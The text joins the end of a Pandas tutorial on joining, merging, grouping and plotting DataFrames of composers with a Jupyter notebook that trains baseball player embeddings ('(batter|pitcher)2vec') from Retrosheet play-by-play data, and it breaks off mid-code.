Pandas. `join()` operates on two tables: the first one is the "left" table which uses `join()` as a method. The other table is the "right" one. Let's try the default join settings: ``` composers1.join(composers2) ``` We see that Pandas was smart enough to notice that the two tables had a index name and used it to combine the tables. We also see that one element from the second table (Brahms) is missing. The reason for this is the way indices not present in both tables are handled. There are four ways of doing this with two tables called here the "left" and "right" table. ### Join left The two Dataframes that should be merged have a common index, but not necessarily the same items. For example here Shostakovich is missing in the second table, while Brahms is missing in the first one. When using the "left" join, we use the first Dataframe as basis and only use the indices that appear there. ``` composers1.join(composers2, how = 'left') ``` ### Join right When using the "right" join, we use the second Dataframe as basis and only use the indices that appear there. ``` composers1.join(composers2, how = 'right') ``` ### Inner join When using the "inner" join, we return only the items that appear in both Dataframes: ``` composers1.join(composers2, how = 'inner') ``` ### Outer join When using the "inner" join, we return all the items that appaer in both Dataframes: ``` composers1.join(composers2, how = 'outer') ``` ## Merging Sometimes tables don't have the same indices but similar contents that we want to merge. For example let's imagine whe have the two Dataframes below: ``` composers1 = pd.read_excel('data/composers.xlsx', sheet_name='Sheet1') composers1 composers2 = pd.read_excel('data/composers.xlsx', sheet_name='Sheet6') composers2 ``` The indices don't match and are not the composer name. In addition the columns containing the composer names have different labels. Here we can use `merge()` and specify which columns we want to use for merging, and what type of merging we need (inner, left etc.) ``` pd.merge(composers1, composers2, left_on='composer', right_on='last name') ``` Again we can use another variety of join than the default inner join. # Data Splitting Often Pandas tables mix regular variables (e.g. the size of cells in microscopy images) with categorical variables (e.g. the type of cell to which they belong). In that case, it is quite usual to split the data using the category to do computations. Pandas allows to do this very easily. ## Grouping ``` composers_df = pd.read_excel('data/composers.xlsx', index_col = 'composer', sheet_name='Sheet5') composers_df composers_df.head() ``` What if we want now to count how many composers we have in each category? In classical computing we would maybe do a for loop to count occurrences. Pandas simplifies this with the `groupby()` function, which actually groups elements by a certain criteria, e.g. a categorical variable like the period: ``` composer_grouped = composers_df.groupby('period') composer_grouped ``` The output is a bit cryptic. What we actually have is a new object called *group* which has a lot of handy properties. First let's see what the groups actually are. As for the Dataframe, let's look at a summary of the object: ``` composer_grouped.describe() ``` So we have a dataframe with a statistical summary of the the contents. The "names" of the groups are here the indices of the Dataframe. These names are simply all the different categories that were present in the column we used for grouping. Now we can recover a single group: ``` composer_grouped.get_group('baroque') ``` If one has multiple categorical variables, one can also do a grouping on several levels. For example here we want to classify composers both by period and country. For this we just give two column names to the `groupby()` function: ``` composer_grouped = composers_df.groupby(['period','country']) composer_grouped.get_group(('baroque','Germany')) ``` The main advantage of this Group object is that it allows us to do very quickly both computations and plotting without having to loop through different categories. Indeed Pandas makes all the work for us: it applies functions on each group and then reassembles the results into a Dataframe (or Series depending on output). For example we can apply most functions we used for Dataframes (mean, sum etc.) on groups as well and Pandas seamlessly does the work for us. ## Unstacking Let's have a look again at one of our grouped Dataframe on which we applied some summary function like a mean on the age column: ``` composers_df['age'] = composers_df['death'] - composers_df['birth'] composers_df.groupby(['country','period']).age.mean() ``` Here we have two level of indices, with the main one being the country which contains all periods. Often for plotting we however need to have the information in another format. In particular we would like each of these values to be one observation in a regular table. For example we could have a country vs period table where all elements are the mean age. To do that we need to **unstack** our multi-level Dataframe: ``` composer_unstacked = composers_df.groupby(['country','period']).age.mean().unstack() composer_unstacked ``` ## Plotting DataFrames Pandas builds on top of Matplotlib but exploits the knowledge included in Dataframes to improve the default output. We can pass Series to Matplotlib which manages to understand them. Here's a default scatter plot: ``` import matplotlib.pyplot as plt composers_df = pd.read_excel('data/composers.xlsx', index_col = 'composer', sheet_name='Sheet5') plt.plot(composers_df.birth, composers_df.death, 'o') plt.show() ``` Different types of plots are accessible when using the `plot` function of DataFrame instances via the `kind` option. The variables to plot are column names passed as keywords instead of whole series like in Matplotlib: ``` composers_df.plot(x = 'birth', y = 'death', kind = 'scatter') plt.show() composers_df.plot(x = 'birth', y = 'death', kind = 'scatter', title = 'Composer birth and death', grid = True, fontsize = 15) plt.show() ``` Some additional plotting options are available in the plot() module. For example histograms: ``` composers_df.plot.hist(alpha = 0.5) plt.show() ``` Here you see again the gain from using Pandas: without specifying anything, Pandas made a histogram of the two columns containing numbers, labelled the axis and even added a legend to the plot.
github_jupyter
# Table of Contents * [**Preparation**](#Preparation) * [**Introduction**](#Introduction) * [**Data Collection**](#Data-Collection) * [**Data Preprocessing**](#Data-Preprocessing) * [**Building and Training the Model**](#Building-and-Training-the-Model) * [**Qualitative Analysis of Player Vectors**](#Qualitative-Analysis-of-Player-Vectors) * [**t-SNE**](#t-SNE) * [**PCA**](#PCA) * [**ScatterPlot3D**](#ScatterPlot3D) * [**Player Algebra**](#Player-Algebra) * [**Nearest Neighbors**](#Nearest-Neighbors) * [**Opposite-handed Doppelgängers**](#Opposite-handed-Doppelgängers) * [**Modeling Previously Unseen At-Bat Matchups**](#Modeling-Previously-Unseen-At-Bat-Matchups) # Preparation I use Python 3, but everything should work with Python 2. 1. Install [HDF5](https://www.hdfgroup.org/HDF5/release/obtain5.html). 2. Install other packages: <code>pip install h5py keras matplotlib numpy pyyaml scipy scikit-learn seaborn tensorflow theano urllib3</code> # Introduction The goal of this project was to learn distributed representations of MLB players. Theoretically, meaningful representations (i.e., representations that capture real baseball qualities of players) could then be used for other types of analyses, such as simulating season outcomes following trades. <code>(batter|pitcher)2vec</code> was inspired by [<code>word2vec</code>](https://en.wikipedia.org/wiki/Word2vec) (hence the name), which is a model that learns distributed representations of words. These learned word vectors often have interesting properties; for example, Paris - France + Italy in the word vector space is very close to the vector for Rome (see [here](https://papers.nips.cc/paper/5021-distributed-representations-of-words-and-phrases-and-their-compositionality.pdf) and [here](http://arxiv.org/pdf/1301.3781.pdf) for more details). In this notebook, I'll show you how I built a model that simultaneously learns distributed representations of pitchers and batters from at-bat data. # Data Collection To start things off, let's download and extract some data from [Retrosheet.org](http://retrosheet.org/). We'll use play-by-play data from the 2013, 2014, 2015, and 2016 seasons. ``` import urllib.request import zipfile from os import makedirs from os.path import exists project_directory = "/home/airalcorn2/Projects/batter_pitcher_2vec/batter-pitcher-2vec/" # Change this. zip_name = "2010seve" data_directory = project_directory + zip_name if not exists(data_directory): makedirs(project_directory, exist_ok = True) zip_f = data_directory + ".zip" urllib.request.urlretrieve("http://www.retrosheet.org/events/{0}.zip".format(zip_name), zip_f) zip_ref = zipfile.ZipFile(zip_f, "r") zip_ref.extractall(project_directory + zip_name) zip_ref.close() ``` And now we'll prepare some variables for organizing the data. ``` import re from os import listdir from os.path import isfile, join data_files = [f for f in listdir(data_directory) if isfile(join(data_directory, f))] at_bats = {} home_runs = {} singles = {} doubles = {} counts = {"batter": {}, "pitcher": {}} data = {} train_years = ["2013", "2014", "2015"] test_year = "2016" year_match = r"201(3|4|5|6)" for year in train_years + [test_year]: data[year] = [] ``` Next, we'll read in the data. Unfortunately, this is going to be a bunch of spaghetti code. The goal is to collect the batter, pitcher, and outcome (e.g., strike out, home run) for every at-bat. By the end of the following code block, we'll have a Python list of dictionaries where each element has the format <code>{"batter": batter, "pitcher": pitcher, "outcome": outcome}</code>. To best understand what's going on in the code, you'll have to read through Retrosheet's [game file documentation](http://www.retrosheet.org/game.htm). ``` import string for data_file in data_files: year_re = re.search(year_match, data_file) if year_re is None: continue year = year_re.group() # Skip non-event files. if not (".EVA" in data_file or ".EVN" in data_file): continue f = open(join(data_directory, data_file)) home_pitcher = None away_pitcher = None line = f.readline().strip() while line != "": parts = line.split(",") # Get starting pitchers. if parts[0] == "id": while parts[0] != "play": line = f.readline().strip() parts = line.split(",") if parts[0] == "start" and parts[-1] == "1": if parts[3] == "0": away_pitcher = parts[1] else: home_pitcher = parts[1] # Get at-bat data. if parts[0] == "play": batter = parts[3] pitcher = home_pitcher if parts[2] == "1": pitcher = away_pitcher outcome = "" # Handle balks, intentional, walks, hit by a pitch, # strike outs, and walks.. if parts[-1][:2] in {"BK", "IW", "HP"}: outcome = "p_" + parts[-1][:2] elif parts[-1][0] in {"K", "I", "W"}: outcome = "p_" + parts[-1][0] # If the last pitch resulted in contact, figure out the pitch outcome. # See "Events made by the batter at the plate" here: http://www.retrosheet.org/eventfile.htm#8. pitches = parts[5] if len(pitches) > 0 and pitches[-1] == "X": play_parts = parts[6].split("/") main_play = play_parts[0] play = main_play.split(".")[0] if play[0] == "H": play = "HR" elif play[0] in string.digits: play = play[0] elif play[0] in {"S", "D", "T"}: play = play[:2] # Try to get first ball handler. if len(play) < 2: try: handlers = play_parts[1] if handlers in string.digits: play = play[0] + handlers[0] except IndexError: play = play[0] + "X" elif play[:2] == "FC": play = play[2] outcome = "h_" + play if play == "HR": home_runs[batter] = home_runs.get(batter, 0) + 1 elif play[0] == "S": singles[batter] = singles.get(batter, 0) + 1 elif play[0] == "D": doubles[batter] = doubles.get(batter, 0) + 1 # Ignore catcher interference and ambiguous singles. if outcome not in {"h_C", "h_S"} and outcome != "": data[year].append({"batter": batter, "pitcher": pitcher, "outcome": outcome}) at_bats[batter] = at_bats.get(batter, 0) + 1 counts["batter"][batter] = counts["batter"].get(batter, 0) + 1 counts["pitcher"][pitcher] = counts["pitcher"].get(pitcher, 0) + 1 # Handle pitcher changes. if parts[0] == "sub": if parts[-1] == "1": if parts[3] == "0": away_pitcher = parts[1] else: home_pitcher = parts[1] line = f.readline().strip() f.close() ``` ## Data Preprocessing OK, now that we have our raw data, we're going to establish some cutoffs so that we're only analyzing players with a reasonable number of observations. Let's just focus on the most frequent batters and pitchers who were involved in 90% of the at-bats. ``` cutoffs = {} percentile_cutoff = 0.9 for player_type in ["batter", "pitcher"]: counts_list = list(counts[player_type].values()) counts_list.sort(reverse = True) total_at_bats = sum(counts_list) cumulative_percentage = [sum(counts_list[:i + 1]) / total_at_bats for i in range(len(counts_list))] cutoff_index = sum([1 for total in cumulative_percentage if total <= percentile_cutoff]) cutoff = counts_list[cutoff_index] cutoffs[player_type] = cutoff print("Original: {0}\tNew: {1}\tProportion: {2:.2f}".format( len(counts[player_type]), cutoff_index, cutoff_index / len(counts[player_type]))) ``` As you can see, only 32% of batters and 46% of pitchers were involved in 90% of at-bats. Let's use these new cutoff points to build the final data set. ``` final_data = [] original_data = 0 matchups = set() for year in train_years: original_data += len(data[year]) for sample in data[year]: batter = sample["batter"] pitcher = sample["pitcher"] matchups.add("{0}_{1}".format(batter, pitcher)) if counts["batter"][batter] >= cutoffs["batter"] and counts["pitcher"][pitcher] >= cutoffs["pitcher"]: final_data.append(sample) print("Original: {0}\tReduced: {1}".format(original_data, len(final_data))) print("{0:.2f}% of original data set.".format(len(final_data) / original_data)) ``` As you can see, we still retain a large amount of data even after removing infrequent batters and pitchers. Next, we're going to associate an integer index with each of our batters, pitchers, and outcomes, respectively. ``` import random FAV_NUM = 2010 random.seed(FAV_NUM) random.shuffle(final_data) categories = {"batter": set(), "pitcher": set(), "outcome": set()} for sample in final_data: categories["batter"].add(sample["batter"]) categories["pitcher"].add(sample["pitcher"]) categories["outcome"].add(sample["outcome"]) for column in categories: categories[column] = list(categories[column]) categories[column].sort() NUM_OUTCOMES = len(categories["outcome"]) print("NUM_OUTCOMES: {0}".format(NUM_OUTCOMES)) print(" ".join(categories["outcome"])) category_to_int = {} for column in categories: category_to_int[column] = {categories[column][i]: i for i in range(len(categories[column]))} import matplotlib.pyplot as plt import seaborn as sns outcome_counts = {} for year in train_years: for sample in data[year]: outcome = sample["outcome"] outcome_counts[outcome] = outcome_counts.get(outcome, 0) + 1 outcome_counts = list(outcome_counts.items()) outcome_counts.sort(key = lambda x: x[1], reverse = True) val = [x[1] for x in outcome_counts] symbols = [x[0] for x in outcome_counts] pos = range(len(outcome_counts)) fig, ax = plt.subplots() fig.set_size_inches(30, 30) ax = sns.barplot(x = val, y = symbols) plt.show() ``` We'll then use these newly defined integer indices to build the appropriate NumPy arrays for our model. ``` import numpy as np np.random.seed(FAV_NUM) from keras.utils import np_utils data_sets = {"batter": [], "pitcher": [], "outcome": []} for sample in final_data: for column in sample: value = sample[column] value_index = category_to_int[column][value] data_sets[column].append([value_index]) for column in ["batter", "pitcher"]: data_sets[column] = np.array(data_sets[column]) data_sets["outcome"] = np_utils.to_categorical(np.array(data_sets["outcome"]), NUM_OUTCOMES) ``` # Building and Training the Model We're now ready to build our model with [Keras](http://keras.io/). The model is similar in spirit to the <code>word2vec</code> model in that we're trying to learn the player vectors that best predict the outcome of an at-bat (the "target word" in <code>word2vec</code>) given a certain batter and pitcher (the "context" in <code>word2vec</code>). We'll learn separate embedding matrices for batters and pitchers. ``` from keras import optimizers from keras.layers import Activation, concatenate, Dense, Dropout, Embedding, Input, Reshape from keras.models import Model NUM_BATTERS = len(categories["batter"]) NUM_PITCHERS = len(categories["pitcher"]) VEC_SIZE = 9 ACTIVATION = "sigmoid" batter_idx = Input(shape = (1, ), dtype = "int32", name = "batter_idx") batter_embed = Embedding(NUM_BATTERS, VEC_SIZE, input_length = 1)(batter_idx) batter_embed = Reshape((VEC_SIZE, ), name = "batter_embed")(batter_embed) batter_embed = Activation(ACTIVATION)(batter_embed) pitcher_idx = Input(shape = (1, ), dtype = "int32", name = "pitcher_idx") pitcher_embed = Embedding(NUM_PITCHERS, VEC_SIZE, input_length = 1)(pitcher_idx) pitcher_embed = Reshape((VEC_SIZE, ), name = "pitcher_embed")(pitcher_embed) pitcher_embed = Activation(ACTIVATION)(pitcher_embed) batter_pitcher = concatenate([batter_embed, pitcher_embed], name = "batter_pitcher") output = Dense(NUM_OUTCOMES, activation = "softmax")(batter_pitcher) model = Model(inputs = [batter_idx, pitcher_idx], outputs = [output]) sgd = optimizers.SGD(lr = 0.01, decay = 1e-6, momentum = 0.9, nesterov = True) model.compile(optimizer = sgd, loss = "categorical_crossentropy") ``` And now we're ready to train our model. We'll save the weights at the end of training. ``` BATCH_SIZE = 100 NUM_EPOCHS = 100 VALID = False validation_split = 0.0 callbacks = None if VALID: from keras.callbacks import ModelCheckpoint validation_split = 0.01 callbacks = [ModelCheckpoint("weights.h5", save_best_only = True, save_weights_only = True)] X_list = [data_sets["batter"], data_sets["pitcher"]] y = data_sets["outcome"] history = model.fit(X_list, y, epochs = NUM_EPOCHS, batch_size = BATCH_SIZE, verbose = 2, shuffle = True, callbacks = callbacks, validation_split = validation_split) if not VALID: model.save_weights("weights.h5") model.load_weights("weights.h5") if VALID: plt.plot(history.history["loss"]) plt.plot(history.history["val_loss"]) plt.title("model loss") plt.ylabel("loss") plt.xlabel("epoch") plt.legend(["train", "valid"], loc = "upper right") plt.show() ``` We'll also train a logistic regression model so that we have something to compare to <code>(batter|pitcher)2vec</code>. ``` TRAIN_ALT = True alt_model = None if TRAIN_ALT: from scipy.sparse import csr_matrix, hstack from sklearn.linear_model import LogisticRegression X_batters = csr_matrix(np_utils.to_categorical(np.array(data_sets["batter"]), NUM_BATTERS)) X_pitchers = csr_matrix(np_utils.to_categorical(np.array(data_sets["pitcher"]), NUM_PITCHERS)) X = hstack([X_batters, X_pitchers]) y = np.argmax(data_sets["outcome"], axis = 1) alt_model = LogisticRegression(n_jobs = -1) results = alt_model.fit(X, y) ``` # Qualitative Analysis of Player Vectors Having trained the model, let's go ahead and fetch the distributed representations for all players. To do so, we need to define some functions that return a vector when provided with a player's integer index. ``` from keras import backend get_batter_vec = backend.function([batter_idx], [batter_embed]) get_pitcher_vec = backend.function([pitcher_idx], [pitcher_embed]) # Retrieve distributed representation of players. batter_vecs = get_batter_vec([np.array(range(NUM_BATTERS)).reshape((NUM_BATTERS, 1))])[0] pitcher_vecs = get_pitcher_vec([np.array(range(NUM_PITCHERS)).reshape((NUM_PITCHERS, 1))])[0] player_vecs = {"batter": batter_vecs, "pitcher": pitcher_vecs} ``` Alright, let's find out if these representations are revealing anything interesting. First, let's collect some information about the players. ``` # Retrieve player data. player_data = {} for data_file in data_files: if ".ROS" in data_file: f = open(join(data_directory, data_file)) for line in f: parts = line.strip().split(",") player_id = parts[0] last_name = parts[1] first_name = parts[2] name = first_name + " " + last_name batting_hand = parts[3] throwing_hand = parts[4] position = parts[6] player_data[player_id] = {"name": name, "batting_hand": batting_hand, "throwing_hand": throwing_hand, "position": position} ``` ## t-SNE Next, we'll use the [t-SNE](https://en.wikipedia.org/wiki/T-distributed_stochastic_neighbor_embedding) algorithm to visualize the player vectors in two and three dimensions. ``` from mpl_toolkits.mplot3d import Axes3D from sklearn.manifold import TSNE NUM_PLAYERS = {"batter": NUM_BATTERS, "pitcher": NUM_PITCHERS} def run_tsne(player_type): """Run t-SNE on the player vectors. :param player_type: :return: """ params = {"batter": {"perplexity": 20, "learning_rate": 200, "init": "pca"}, "pitcher": {"perplexity": 20, "learning_rate": 200, "init": "random"}} tsne = TSNE(n_components = 3, **params[player_type]) manifold_3d = tsne.fit_transform(player_vecs[player_type]) fig = plt.figure() ax = fig.add_subplot(111, projection = "3d") ax.scatter(manifold_3d[:, 0], manifold_3d[:, 1], manifold_3d[:, 2], color = "gray") plt.show() params = {"batter": {"perplexity": 20, "learning_rate": 550, "init": "pca"}, "pitcher": {"perplexity": 20, "learning_rate": 200, "init": "random"}} tsne = TSNE(n_components = 2, **params[player_type]) manifold_2d = tsne.fit_transform(player_vecs[player_type]) (x, y) = (manifold_2d[:, 0], manifold_2d[:, 1]) plt.scatter(x, y, color = "gray") interesting_batters = {"Mike Trout", "Paul Goldschmidt", "Dee Gordon", "Ichiro Suzuki", "Bryce Harper"} interesting_pitchers = {"Clayton Kershaw", "Felix Hernandez", "Madison Bumgarner", "Aroldis Chapman", "Dellin Betances"} interesting_players = {"batter": interesting_batters, "pitcher": interesting_pitchers} for i in range(NUM_PLAYERS[player_type]): player_id = categories[player_type][i] player_name = player_data[player_id]["name"] if player_name in interesting_players[player_type]: plt.text(x[i], y[i], player_name, va = "top", family = "monospace") plt.show() return manifold_3d tsne_batters = run_tsne("batter") tsne_pitchers = run_tsne("pitcher") ``` ## PCA Let's also visualize the first few PCs of a [principal component analysis](https://en.wikipedia.org/wiki/Principal_component_analysis) (PCA) of the vectors and color them with various interesting properties. ``` import csv import pandas as pd playerID_to_retroID = {} reader = csv.DictReader(open("Master.csv")) for row in reader: playerID = row["playerID"] retroID = row["retroID"] playerID_to_retroID[playerID] = retroID # Get player salaries. reader = csv.DictReader(open("Salaries.csv")) salaries = {} for row in reader: if row["yearID"] == "2015": playerID = row["playerID"] retroID = playerID_to_retroID[playerID] log_salary = np.log2(int(row["salary"])) salaries[retroID] = log_salary # Set up other inteteresting data for coloring. max_hr_rate = max([home_runs.get(batter_id, 0) / at_bats[batter_id] for batter_id in at_bats if batter_id in categories["batter"]]) max_single_rate = max([singles.get(batter_id, 0) / at_bats[batter_id] for batter_id in at_bats if batter_id in categories["batter"]]) max_double_rate = max([doubles.get(batter_id, 0) / at_bats[batter_id] for batter_id in at_bats if batter_id in categories["batter"]]) max_salary = max([salaries.get(batter_id, 0) for batter_id in at_bats if batter_id in categories["batter"]]) batter_colors = {"player_id": [], "hand": [], "Home Runs": [], "Singles": [], "Doubles": [], "salary": []} for i in range(NUM_BATTERS): batter_id = categories["batter"][i] batting_hand = player_data[batter_id]["batting_hand"] batter_colors["player_id"].append(batter_id) batter_colors["hand"].append(batting_hand) # batter_colors["Home Runs"].append(str((home_runs.get(batter_id, 0) / at_bats[batter_id]) / max_hr_rate)) batter_colors["Home Runs"].append(str(home_runs.get(batter_id, 0) / at_bats[batter_id])) batter_colors["Singles"].append(str(singles.get(batter_id, 0) / at_bats[batter_id])) batter_colors["Doubles"].append(str((doubles.get(batter_id, 0) / at_bats[batter_id]) / max_double_rate)) batter_colors["salary"].append(str((salaries.get(batter_id, 0) / max_salary))) df = pd.DataFrame(batter_colors) from sklearn import decomposition # Run PCA. pca = decomposition.PCA() pca.fit(batter_vecs) print(pca.explained_variance_ratio_) projected_batters = pca.transform(batter_vecs) pca.fit(pitcher_vecs) print(pca.explained_variance_ratio_) projected_pitchers = pca.transform(pitcher_vecs) for i in range(3): df["pc{0}".format(i + 1)] = projected_batters[:, i] cmap = sns.cubehelix_palette(as_cmap = True) # fig = plt.figure() # ax = fig.add_subplot(111, projection = "3d") # ax.scatter(projected_batters[:, 0], projected_batters[:, 1], projected_batters[:, 2], color = df["Home Runs"], cmap = cmap) # ax.set_title("Batters") # plt.show() cs = sns.color_palette("hls", 8) batting_hand_color = {"Left": cs[0], "Right": cs[3], "Both": cs[5]} legend_data = [] legend_names = [] for (hand, color) in batting_hand_color.items(): batter_hands = df[df["hand"] == hand[0]] legend_data.append(plt.scatter(batter_hands["pc1"], batter_hands["pc2"], s = 50, color = color)) legend_names.append(hand) plt.title("Batting Hand") plt.legend(legend_data, legend_names) plt.show() for batter_color in ["Singles", "Home Runs", "Doubles", "salary"]: (f, ax) = plt.subplots() points = ax.scatter(df["pc1"], df["pc2"], c = df[batter_color], s = 50, cmap = cmap) f.colorbar(points) ax.set_title(batter_color) plt.show() ``` As you can see, there are some interesting patterns emerging from the representations. For example, right-handed hitters are clearly separated from left-handed and switch hitters. Similarly, frequent singles hitters are far from infrequent singles hitters. So, the model is clearly learning something, but whether or not what it's learning is non-trivial remains to be seen. Let's go ahead and save the t-SNE map and PC scores to CSV files so that we can play around with them elsewhere. ``` import csv def write_viz_data(player_type, projected, fieldnames, projection): """Write the visualization coordinates of the players to a file. :param player_type: :param projected: :param fieldnames: :return: """ out = open("{0}s_{1}.csv".format(player_type, projection), "w") output = csv.DictWriter(out, fieldnames = fieldnames) output.writeheader() for i in range(NUM_PLAYERS[player_type]): player_id = categories[player_type][i] row = {} for col in fieldnames: if col in player_data[player_id]: row[col] = player_data[player_id][col] row["2015_salary"] = 2 ** salaries.get(player_id, 0) xyz = ["x", "y", "z"] for j in range(3): if projection == "pca": row["PC{0}".format(j + 1)] = projected[i][j] else: row[xyz[j]] = projected[i][j] row["player_id"] = player_id if player_type == "batter": row["hr_rate"] = home_runs.get(player_id, 0) / at_bats[player_id] nothing = output.writerow(row) out.close() fieldnames = ["player_id", "name", "2015_salary", "position", "batting_hand", "throwing_hand", "hr_rate", "PC1", "PC2", "PC3"] write_viz_data("batter", projected_batters, fieldnames, "pca") write_viz_data("batter", tsne_batters, fieldnames[:-3] + ["x", "y", "z"], "tsne") fieldnames = ["player_id", "name", "2015_salary", "throwing_hand", "PC1", "PC2", "PC3"] write_viz_data("pitcher", projected_pitchers, fieldnames, "pca") write_viz_data("pitcher", tsne_pitchers, fieldnames[:-3] + ["x", "y", "z"], "tsne") ``` Let's also save the raw player vectors. ``` def write_distributed_representations(player_type, player_vecs): """Write the player vectors to a file. :param player_type: :param player_vecs: :return: """ out = open("{0}s_latent.csv".format(player_type), "w") fieldnames = ["player_id", "name"] + ["latent_{0}".format(i + 1) for i in range(VEC_SIZE)] output = csv.DictWriter(out, fieldnames = fieldnames) output.writeheader() for i in range(NUM_PLAYERS[player_type]): player_id = categories[player_type][i] row = {"player_id": player_id, "name": player_data[player_id]["name"]} for j in range(VEC_SIZE): row["latent_{0}".format(j + 1)] = player_vecs[i][j] nothing = output.writerow(row) out.close() write_distributed_representations("batter", batter_vecs) write_distributed_representations("pitcher", pitcher_vecs) ``` ## ScatterPlot3D To gain some additional intuition with the player representations, I recommend exploring them in my open source scatter plot visualization application, [ScatterPlot3D](https://sites.google.com/view/michaelaalcorn/projects/scatterplot3d). To run it: 1. Download the appropriate build. 2. Run with <code>java -jar ScatterPlot3D-&lt;version&gt;.jar</code> on Linux systems or by double-clicking the JAR on Windows. 3. Load the data. 4. Put 5, 6, and 7 for x, y, and z for "pitchers_tsne.csv" or 8, 9, and 10 for "batters_tsne.csv". 5. Click "Submit". You can then search, zoom, and rotate the data, and click on individual points for more details. For example: <img src="batters_tsne_all.png" width="600"> <img src="trout_goldschmidt.png" width="600"> Documentation can be downloaded [here](https://sites.google.com/view/michaelaalcorn/ScatterPlot3D/SupplementaryMaterials.zip?attredirects=0&d=1) and a gallery of application screenshots can be found [here](http://imgur.com/a/U833y). # Player Algebra ## Nearest Neighbors So, do these vectors contain any non-obvious information? Maybe comparing nearest neighbors will provide some insight. ``` import pandas as pd def get_nearest_neighbors(name, data, latent_vecs, player_names, k = 5): """Print the k nearest neighbors (in the latent space) of a given player. :param name: :param data: :param latent_vecs: :param player_names: :param k: :return: """ player_index = np.where(data["name"] == name)[0] player_latent = latent_vecs[player_index] print(player_latent[0]) # distances = list(np.linalg.norm(latent_vecs - player_latent, axis = 1)) distances = 1 - np.dot(latent_vecs, player_latent.T).flatten() / (np.linalg.norm(latent_vecs, axis = 1) * np.linalg.norm(player_latent)) distances_and_ids = list(zip(player_names, distances)) distances_and_ids.sort(key = lambda x: x[1]) return distances_and_ids[1:1 + k] data_files = ["batters_latent.csv", "pitchers_latent.csv"] player_df = {} player_names = {} player_ids = {} latent_vecs = {} for player_type in ["batter", "pitcher"]: data_file = "{0}s_latent.csv".format(player_type) player_df[player_type] = pd.read_csv(data_file) player_ids[player_type] = list(player_df[player_type]["player_id"]) player_names[player_type] = list(player_df[player_type]["name"]) latent_vecs[player_type] = np.array(player_df[player_type].iloc[:, 2:]) for batter in ["Mike Trout", "Dee Gordon"]: print(batter) print(get_nearest_neighbors(batter, player_df["batter"], latent_vecs["batter"], player_names["batter"])) print() for pitcher in ["Clayton Kershaw", "Aroldis Chapman", "Jake Arrieta", "Felix Hernandez"]: print(pitcher) print(get_nearest_neighbors(pitcher, player_df["pitcher"], latent_vecs["pitcher"], player_names["pitcher"])) print() ``` At a first glance, the nearest neighbors produced by the embedding do seem to support baseball intuition. Both Mike Trout and Paul Goldschmidt are known for their [rare blend of speed and power](https://sports.vice.com/en_us/article/paul-goldschmidt-might-really-be-this-good). Like [Dee Gordon](http://ftw.usatoday.com/2015/06/dee-gordon-miami-marlins-inside-park-home-run), Ichiro Suzuki [has a knack for being able to get on base](http://www.fangraphs.com/blogs/dee-gordon-has-been-going-full-ichiro/). Zack Greinke's presence among Clayton Kershaw's nearest neighbors is interesting as they are considered [one of the best pitching duos of all time](https://www.si.com/cauldron/2015/09/17/clayton-kershaw-zack-greinke-cy-young-mlb). The similarities between Craig Stammen and Kershaw are not obvious to my ignorant baseball eye, but we would expect a method like <code>(batter|pitcher)2vec</code> (if effective) to occasionally discover surprising neighbors or else it wouldn't be particularly useful. Aroldis Chapman's nearest neighbors are fairly unsurprising with [Craig Kimbrel](https://www.scientificamerican.com/article/the-documentary-fastball-tosses-some-physics-at-fans/) and [Andrew Miller](http://www.cbssports.com/mlb/news/world-series-from-teammates-to-foes-indians-andrew-miller-cubs-aroldis-chapman-meet-again/) both being elite relief pitchers. When clustering players using common MLB stats (e.g., HRs, RBIs), Mike Trout's ten nearest neighbors for the 2015 season are: Bryce Harper, Julio Daniel Martinez, Andrew McCutchen, Justin Upton, Matt Carpenter, Joey Votto, Curtis Granderson, Kris Bryant, Chris Davis, and Brian Dozier (R code [here](https://github.com/airalcorn2/batter-pitcher-2vec/blob/master/raw_stats_neighbors.R)). So there is some overlap between the two neighborhood methods, but, intriguingly, the nearest neighbor from each method is not found in the neighborhood of the other method. Similarly, Ichiro isn't among Dee Gordon's ten nearest neighbors when clustering on standard MLB stats. ## Opposite-handed Doppelgängers Another fun thing to try is analogies. As I mentioned at the beginning of this notebook, word embeddings often contain interesting analogy properties. [Erik Erlandson](https://www.linkedin.com/in/erikerlandson), a colleague of mine at Red Hat, suggested I use average vectors for right-handed and left-handed batters to generate opposite-handed doppelgängers for different players. Let's see what that looks like. ``` def get_opposite_hand(name, batting_hand, df, latent_vecs, player_names, k = 10): """Find the player's opposite batting hand doppelgänger. :param name: :param batting_hand: :param df: :param latent_vecs: :param player_names: :param k: :return: """ player_index = np.where(df["name"] == name)[0] player_latent = latent_vecs[player_index] player_latent + average_batters["R"] opposite_hand = None if batting_hand == "R": opposite_hand = player_latent - average_batters["R"] + average_batters["L"] else: opposite_hand = player_latent - average_batters["L"] + average_batters["R"] # distances = list(np.linalg.norm(latent_vecs - opposite_hand, axis = 1)) distances = 1 - np.dot(latent_vecs, opposite_hand.T).flatten() / (np.linalg.norm(latent_vecs, axis = 1) * np.linalg.norm(opposite_hand)) distances_and_ids = list(zip(player_names, distances)) distances_and_ids.sort(key = lambda x: x[1]) return distances_and_ids[:k] # Generate average vectors for each batting hand. average_batters = {"R": [], "L": [], "B": []} for player_id in player_data: hand = player_data[player_id]["batting_hand"] batter_index = np.where(player_df["batter"]["player_id"] == player_id)[0] batter_latent = latent_vecs["batter"][batter_index] if len(batter_latent) > 0: average_batters[hand] += [batter_latent] for batting_hand in average_batters: average_batters[batting_hand] = np.array(average_batters[batting_hand]).mean(axis = 0) # Get opposite-handed doppelgängers. print("Mike Trout") print(get_opposite_hand("Mike Trout", "R", player_df["batter"], latent_vecs["batter"], player_names["batter"])) print() print("Dee Gordon") print(get_opposite_hand("Dee Gordon", "L", player_df["batter"], latent_vecs["batter"], player_names["batter"])) print() ``` Bryce Harper's presence among Mike Trout's left-handed doppelgängers [is particularly satisfying](http://www.sportingnews.com/mlb/news/sn50-2016-best-baseball-players-mike-trout-bryce-harper/mk3kmorbiyhr1f7onb7t5pehq). As for Dee Gordon's right-handed doppelgängers, Tyler Saladino is known for "[legging 'em out](http://www.fangraphs.com/fantasy/all-aboard-the-tyler-saladino-hype-train/)". # Modeling Previously Unseen At-Bat Matchups Measuring how well the <code>(batter|pitcher)2vec</code> representations predict outcome distributions for unseen matchups is the ultimate test of whether the representations are capturing anything meaningful about players. To test the model, we'll look at matchups from the 2016 season that were not seen in the training set. ``` matchup_counts = {} outcome_counts = {} for sample in data[test_year]: batter = sample["batter"] pitcher = sample["pitcher"] matchup = "{0}_{1}".format(batter, pitcher) if batter in categories["batter"] and pitcher in categories["pitcher"] and matchup not in matchups: matchup_counts[matchup] = matchup_counts.get(matchup, 0) + 1 if matchup not in outcome_counts: 